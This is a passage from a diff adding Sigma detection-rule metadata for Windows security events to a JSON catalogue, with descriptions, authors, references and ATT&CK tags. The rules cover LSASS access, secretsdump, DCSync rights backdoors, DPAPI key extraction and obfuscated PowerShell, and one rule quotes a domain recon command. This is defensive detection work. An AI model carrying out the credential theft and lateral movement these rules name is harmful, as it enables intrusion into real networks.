"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" + }, + { + "description": "Detects WRITE_DAC access to a domain object", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_ad_object_writedac_access.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "value": "AD Object WriteDAC Access" + }, + { + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/10", + "falsepositive": [ + "Faulty legacy applications" + ], + "filename": "win_security_susp_kerberos_manipulation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", + "value": "Kerberos Manipulation" + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "filename": "win_security_lm_namedpipe.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1104489274387451904", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "value": "First Time Seen Remote Named Pipe" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security" + }, + { + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_group_modification_logging.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml" + ], + "tags": "No established tags" + }, + "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "value": "Group Modification Logging" + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ] + }, + "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", + "value": "Transferring Files with Credential Data via Network Shares" + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "meta": { + "author": "@SBousseaden, Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_krbrelayup.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", + "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "value": "KrbRelayUp Attack Pattern" + }, + { + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate use of remote PowerShell execution" + ], + "filename": "win_security_remote_powershell_session.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "value": "Remote PowerShell Sessions Network Connections (WinRM)" + }, + { + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "meta": { + "author": "xknow @xknow_infosec", + "creation_date": "2019/03/24", + "falsepositive": [ + "Companies, who may use these default LDAP-Attributes for personal information" + ], + "filename": "win_security_susp_ldap_dataexchange.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://github.com/fox-it/LDAPFragger", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ] + }, + "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "value": "Suspicious LDAP-Attributes Used" + }, + { + "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_explicit_credentials.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", + "value": "Multiple Users Attempting To Authenticate Using Explicit Credentials" + }, + { + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_lsass_access_non_system_account.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "value": "LSASS Access from Non System Account" + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "meta": { + "author": "Samir Bousseaden, wagga", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_impacket_secretdump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ] + }, + "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "value": "Possible Impacket SecretDump Remote Activity" + }, + { + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "meta": { + "author": "Orlinum , BlueDefenZer", + "creation_date": "2021/11/17", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU" + }, + { + "description": "Detects DCShadow via create new SPN", + "meta": { + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2019/10/25", + "falsepositive": [ + "Valid on domain controllers; exclude known DCs" + ], + "filename": "win_security_possible_dc_shadow.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1207" + ] + }, + "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "value": "Possible DC Shadow Attack" + }, + { + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dpapi_domain_backupkey_extraction.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.004" + ] + }, + "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "value": "DPAPI Domain Backup Key Extraction" + }, + { + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", + "meta": { + "author": "David Strassegger, Tim Shelton", + "creation_date": "2021/01/22", + "falsepositive": [ + "Software installation" + ], + "filename": "win_security_scheduled_task_deletion.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://twitter.com/matthewdunwoody/status/1352356685982146562", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "car.2013-08-001", + "attack.t1053.005" + ] + }, + "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "value": "Scheduled Task Deletion" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" + }, + { + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "meta": { + "author": "@neu5ron", + "creation_date": "2019/02/05", + "falsepositive": [ + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + ], + "filename": "win_security_susp_time_modification.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", + "Live environment caused by malware", + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "value": "Unauthorized System Time Modification" + }, + { + "description": "Detects NetNTLM downgrade attack", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_net_ntlm_downgrade.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "value": "NetNTLM Downgrade Attack" + }, + { + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/06", + "falsepositive": [ + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" + ], + "filename": "win_security_susp_failed_logon_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" + ] + }, + "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "value": "Failed Logon From Public IP" + }, + { + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." + ], + "filename": "win_security_vssaudit_secevent_source_registration.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "value": "VSSAudit Security Event Source Registration" + }, + { + "description": "RDP login with localhost source address may be a tunnelled login", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_rdp_localhost_login.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" + ] + }, + "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", + "value": "RDP Login from Localhost" + }, + { + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Initial installation of a domain controller" + ], + "filename": "win_security_susp_dsrm_password_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=1714", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "value": "Password Change on Directory Service Restore Mode (DSRM) Account" + }, + { + "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/06/09", + "falsepositive": "No established falsepositives", + "filename": "win_security_susp_samr_pwset.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", + "value": "Possible Remote Password Change Through SAMR" + }, + { + "description": "Detection of logins performed with WMI", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/04", + "falsepositive": [ + "Monitoring tools", + "Legitimate system administration" + ], + "filename": "win_security_susp_wmi_login.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_wmi_login.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", + "value": "Login with WMI" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_apt_chafer_mar18_security.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_chafer_mar18_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "value": "Chafer Activity - Security" + }, + { + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_stdin_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", + "value": "Invoke-Obfuscation STDIN+ Launcher - Security" + }, + { + "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", + "meta": { + "author": "Vasiliy Burov, oscd.community", + "creation_date": "2020/10/16", + "falsepositive": [ + "Software uninstallation", + "Files restore activities" + ], + "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", + "value": "Suspicious Multiple File Rename Or Delete Occurred" + }, + { + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "meta": { + "author": "Michaela Adams, Zach Mathis", + "creation_date": "2022/11/06", + "falsepositive": [ + "Anti-Virus" + ], + "filename": "win_security_access_token_abuse.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", + "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", + "https://attack.mitre.org/techniques/T1134/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_access_token_abuse.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1134.001" + ] + }, + "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", + "value": "Access Token Abuse" + }, + { + "description": "Detects code integrity failures such as missing page hashes or corrupted drivers due unauthorized modification. This could be a sign of tampered binaries.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/12/03", + "falsepositive": [ + "Disk device errors" + ], + "filename": "win_security_susp_codeintegrity_check_failure.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", + "value": "Failed Code Integrity Checks" + }, + { + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "meta": { + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "creation_date": "2019/04/03", + "falsepositive": [ + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + ], + "filename": "win_security_account_backdoor_dcsync_rights.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1111556090137903104", + "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "2c99737c-585d-4431-b61a-c911d86ff32f", + "value": "Powerview Add-DomainObjectAcl DCSync AD Extend Right" + }, + { + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Other browsers" + ], + "filename": "win_security_susp_outbound_kerberos_connection.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Rubeus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1558.003" + ] + }, + "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", + "value": "Suspicious Outbound Kerberos Connection - Security" + }, + { + "description": "Detects suspicious processes logging on with explicit credentials", + "meta": { + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrators that use the RunAS command or scheduled tasks" + ], + "filename": "win_security_susp_logon_explicit_credentials.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" + ], + "tags": [ + "attack.t1078", + "attack.lateral_movement" + ] + }, + "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "value": "Suspicious Remote Logon with Explicit Credentials" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_clip_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "value": "Invoke-Obfuscation CLIP+ Launcher - Security" + }, + { + "description": "Detects a source system failing to authenticate against a remote host with multiple users.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_remote_logons_single_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", + "value": "Multiple Users Remotely Failing To Authenticate From Single Source" + }, + { + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "meta": { + "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "creation_date": "2017/03/07", + "falsepositive": [ + "Administrator activity" + ], + "filename": "win_security_susp_net_recon_activity.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" + 